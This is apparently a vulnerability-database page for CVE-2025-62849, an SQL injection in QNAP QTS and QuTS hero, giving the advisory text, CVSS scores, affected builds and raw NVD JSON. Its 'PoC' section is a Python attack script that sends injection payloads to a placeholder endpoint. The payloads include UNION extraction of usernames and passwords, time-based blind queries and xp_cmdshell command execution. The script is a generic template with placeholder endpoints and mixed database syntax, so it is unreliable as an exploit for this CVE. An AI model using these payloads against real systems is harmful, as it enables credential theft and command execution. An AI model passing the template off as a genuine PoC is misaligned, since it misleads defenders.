CVE-2025-62849

Description

An SQL injection vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to execute unauthorized code or commands. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3297 build 20251024 and later QuTS hero h5.2.7.3297 build 20251024 and later QuTS hero h5.3.1.3292 build 20251024 and later

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:qnap:qts:5.2.0.2737:build_20240417:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:qts:5.2.0.2744:build_20240424:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:qts:5.2.0.2782:build_20240601:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:qts:5.2.0.2802:build_20240620:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:qts:5.2.0.2823:build_20240711:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:quts_hero:h5.2.0.2737:build_20240417:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:quts_hero:h5.2.0.2782:build_20240601:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:quts_hero:h5.2.0.2789:build_20240607:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:quts_hero:h5.2.0.2802:build_20240620:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:qnap:quts_hero:h5.2.0.2823:build_20240711:*:*:*:*:*:* - VULNERABLE

QTS < 5.2.7.3297 build 20251024

QuTS hero h5.2.7.3297 build 20251024之前的所有版本

QuTS hero h5.3.1.3292 build 20251024之前的所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62849 SQL Injection PoC
# Target: QNAP QTS / QuTS hero
# This PoC demonstrates the SQL injection vulnerability

import requests
import sys

def exploit_sql_injection(target_url):
    """
    SQL Injection PoC for CVE-2025-62849
    Replace TARGET_ENDPOINT with the vulnerable API endpoint
    """
    
    # Vulnerable endpoint - replace with actual vulnerable parameter
    vulnerable_endpoint = f"{target_url}/cgi-bin/"
    
    # SQL Injection payloads
    payloads = [
        # Basic boolean-based blind injection
        "1' OR '1'='1",
        # Union-based injection to extract data
        "1' UNION SELECT NULL,username,password FROM users--",
        # Time-based blind injection for data extraction
        "1'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--",
        # stacked queries for command execution
        "1'; EXEC xp_cmdshell('whoami')--"
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Testing SQL Injection payloads...")
    
    for i, payload in enumerate(payloads, 1):
        print(f"\n[Payload {i}] Testing: {payload}")
        
        try:
            # Replace 'vulnerable_param' with actual parameter name
            data = {
                'vulnerable_param': payload,
                'auth_token': 'test'
            }
            
            response = requests.post(
                vulnerable_endpoint,
                data=data,
                headers=headers,
                timeout=30,
                verify=False
            )
            
            print(f"[*] Status: {response.status_code}")
            print(f"[*] Response length: {len(response.text)}")
            
            # Check for signs of successful injection
            if 'admin' in response.text.lower() or 'root' in response.text.lower():
                print("[!] Potential data exfiltration detected!")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
    
    print("\n[*] PoC execution completed")
    print("[!] Note: This is for educational purposes only")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-62849_poc.py <target_url>")
        print("Example: python cve-2025-62849_poc.py https://qnap-nas.local")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_sql_injection(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62849
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62849
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62849/
[4] VulDB https://vuldb.com/cve/CVE-2025-62849
[5] https://www.qnap.com/en/security-advisory/qsa-25-45

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62849", "sourceIdentifier": "[email protected]", "published": "2025-12-16T03:15:58.490", "lastModified": "2025-12-17T13:49:10.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An SQL injection vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to execute unauthorized code or commands.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.7.3297 build 20251024 and later\nQuTS hero h5.2.7.3297 build 20251024 and later\nQuTS hero h5.3.1.3292 build 20251024 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2737:build_20240417:*:*:*:*:*:*", "matchCriteriaId": "F4026A4B-7AB4-48EA-971D-88DFDD3F01A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2744:build_20240424:*:*:*:*:*:*", "matchCriteriaId": "1F3F99BB-0D68-4D74-92C8-59E24F96C50D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2782:build_20240601:*:*:*:*:*:*", "matchCriteriaId": "1DE63B4D-8E84-41D3-B1F3-04AE6040242B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2802:build_20240620:*:*:*:*:*:*", "matchCriteriaId": "75746563-C648-4E55-9126-703F915F8B8A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2823:build_20240711:*:*:*:*:*:*", "matchCriteriaId": "AF6BA027-A635-4E90-80C8-130B10AB3D23"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2851:build_20240808:*:*:*:*:*:*", "matchCriteriaId": "5406F242-A215-4B07-809F-7A7CE55ACE71"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2860:build_20240817:*:*:*:*:*:*", "matchCriteriaId": "FA17778E-B3B1-44DD-B4E9-5AD25A3E804C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.1.2930:build_20241025:*:*:*:*:*:*", "matchCriteriaId": "E3FC6646-2247-4ED9-9643-CD376674E2E7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.2.2950:build_20241114:*:*:*:*:*:*", "matchCriteriaId": "62170342-067D-442C-88FB-64A4BEA8AFE4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.3.3006:build_20250108:*:*:*:*:*:*", "matchCriteriaId": "82464467-E1E6-47E1-BDE5-DDFA52994A47"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.4.3070:build_20250312:*:*:*:*:*:*", "matchCriteriaId": "75AE902C-0516-4341-9BF0-21D8803E091C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.4.3079:build_20250321:*:*:*:*:*:*", "matchCriteriaId": "5B005D70-8C91-48D4-B09A-9EBE2E9E5090"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.4.3092:build_20250403:*:*:*:*:*:*", "matchCriteriaId": "82FE5F89-A0E1-4D1B-A363-0A0D4141F502"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.5.3145:build_20250526:*:*:*:*:*:*" ... (truncated)